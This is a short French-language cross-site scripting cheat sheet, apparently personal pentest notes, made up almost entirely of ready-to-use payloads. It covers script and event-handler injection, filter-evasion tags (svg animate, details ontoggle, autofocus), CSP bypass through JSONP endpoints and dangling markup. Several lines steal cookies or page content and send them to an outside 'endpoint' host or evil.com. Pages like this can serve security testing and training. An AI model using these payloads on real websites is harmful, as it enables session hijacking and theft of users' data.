Exécuter du code
XSS sans filtres
<script>alert()</script>
Contourner filtres balises <script>
<img src="" onerror="alert()">
<body onload="alert()">
Récupérer les cookies d’un autre utilisateur
<script>document.location.replace("http://endpoint?cookie="+document.cookie)</script>
Sans redirection:
<script>document.write('<img src="http://endpoint?cookie='+document.cookie+'"')</script>
Exfiltration de données
Exfiltrer les données de la page actuel
<script>document.location.replace("http://endpoint?data="+document.body.innerText)</script>
Dangling Markup:
<img src="http://endpoint?data=
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
Contourner les restrictions de Chrome:
<table background='//endpoint?data=
En utilisant Ajax
<script>
var getData = new XMLHttpRequest();
getData.open("GET", "http://page-where-data-is", false);
getData.send();
var sendData = new XMLHttpRequest();
sendData.open("GET", "http://endpoint?data="+getData.responseText, false);
sendData.send();
</script>
Utiliser les endpoints JSONP pour exploiter les whitelist CSP
<script src="http://jsonp-endpoint-which-is-in-whitelist?callback=alert()"></script>
Bypass common filters
You can use .concat() function instead of +
<script>document.location.replace("http://endpoint?cookie=".concat(document.cookie))</script>
Contourner les filtres sur les balises communes <script>
, <img>
, <a>
, <body>
…
<button onfocus="alert()" autofocus>
<details ontoggle="alert()" open>payload</details>
<svg><animate onbegin="alert()" attributeName=x dur=1s>
<svg><animate onend="alert()" attributeName=x dur=1s>
<svg><animate onrepeat="alert()" attributeName=x dur=1s repeatCount=2 />
<svg><set onbegin="alert()" attributename=x dur=1s>